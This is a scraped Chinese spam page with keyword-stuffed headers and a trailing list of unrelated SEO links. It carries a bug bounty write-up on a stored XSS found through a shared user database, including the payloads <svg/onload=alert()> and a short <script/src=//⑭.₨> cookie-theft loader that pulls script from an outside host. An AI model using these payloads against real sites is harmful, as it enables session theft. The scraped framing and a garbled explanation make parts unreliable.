当前位置: 首页 > news >正文

safari网站入口百度官网下载

safari网站入口,百度官网下载,wordpress403,免费安全建网站大家好,这是我编写的第一篇文章,之所以会分享这个故事,是因为我花了几个晚上的时间,终于找到了解决某个问题的方法。故事如下: 几个月前,我被邀请参加一个非公共的漏洞悬赏项目,在初期发现了一些…

671d8b072d0c52232aa0131a2adb239d.png

大家好,这是我编写的第一篇文章,之所以会分享这个故事,是因为我花了几个晚上的时间,终于找到了解决某个问题的方法。故事如下:

几个月前,我被邀请参加一个非公共的漏洞悬赏项目,在初期发现了一些漏洞后,就再无收获。

而在最后5天里,出于对金钱的渴望,我告诉自己必须在整个项目结束之前再找到一些漏洞,因此我又从头开始梳理整个目标。

这个目标是一个大型的社交网络,而转折就发生在我去创建一个新的帐户时。

当我在用户名处输入一个XSS的payload时,特殊字符: <:’();?>全不能输入,而且长度限制为20个字符。

e21a99dfad32ce4b25e527ee62777ff8.png

此时,我没有太好的办法,只能去寻找其他漏洞。

而当我访问目标范围内的第二个域名,试图用我的电子邮件注册新帐户时,被告知:用户已经注册,请登录。看来,这两个网站使用的是同一个数据库的用户数据,那么我可以借这个网站插入XSS么?

我很快进入到“个人资料”页面,尝试编辑我的用户名。是的,的确没有了敏感字符限制!

但是,这个长度还是被限制在20个字符以内。

我首先输入一个简单的payload来确认XSS的存在:<svg/onload=alert()>,这个长度为20个字符。

输入并保存后,我转向第一个网站,并成功在“个人资料”页面发现了弹框!

接下来,我开始探究如何窃取cookie,因为危害越大,奖励越高。

不过由于无法绕过长度限制,所以如何才能用小于20个字符的XSS来窃取cookie?xsshunter工具的确很有用,但payload都太长了,所以我花费了很久的时间不停寻找新方法。48小时之后,我发现了这条来自2016年的推特,其中的payload的确很短,来自@0x6D6172696F:

a36e39cabe98d16e24fe23ce8e0e5458.png

<script/src=//⑭.₨>,只有18个字符。其中代表印度卢比,这是1个字符,而不是2个字符,而也是类似的效果。当你访问把这个url粘贴到浏览器去访问时,会发现如下情形:

33eff7650d91860c7c64e0c551fb4a75.png
http://www.hrbkazy.com/news/52840.html

相关文章:

  • 公司做网站需要提供的材料正规seo大概多少钱
  • 建设网站团队seo怎么推广
  • 哪里有好的免费成品网站程序西安的网络优化公司
  • flash做网站轮播图免费涨粉工具
  • 安装下载app宁波网站优化公司推荐
  • 百度网站优化外包百度收录站长工具
  • 做产品目录的网站百度爱采购服务商查询
  • 网站开发职能怎样做网络推广效果好
  • 包头做网站的公司网盘资源免费观看
  • 网站喜报怎么做武汉做seo公司
  • 京东建站模板龙泉驿网站seo
  • 网络行为管理系统seo是什么学校
  • 做零食网站的选题理由百度快照入口
  • 动漫网站开发毕业设计百度竞价包年推广是怎么回事
  • 已备案网站注册天津网络广告公司
  • wordpress仪表盘改名郑州seo外包公司哪家好
  • 承德网站开发网站推广线上推广
  • 学做网站php网站seo入门基础教程书籍
  • 交友网站用什么源码好网站推广常用方法
  • web前端作业网页制作代码网络优化工程师工作内容
  • c 做的网站又哪些网络推广渠道排名
  • 阿里巴巴推广搜索引擎优化的目标
  • 公司网站建设维护的岗位网络销售真恶心
  • 阳信网站建设多层次网络营销合法吗
  • 网站安全管理制度网络营销站点推广的方法
  • 汕头名域设计百度关键词网站排名优化软件
  • 网站空间换了 使用原有域名关键词推广优化排名品牌
  • 阿里云备案后 增加网站百度搜索下载安装
  • 合肥 做网站的公司百度关键词挖掘查询工具
  • 手机app下载官方太原seo网站管理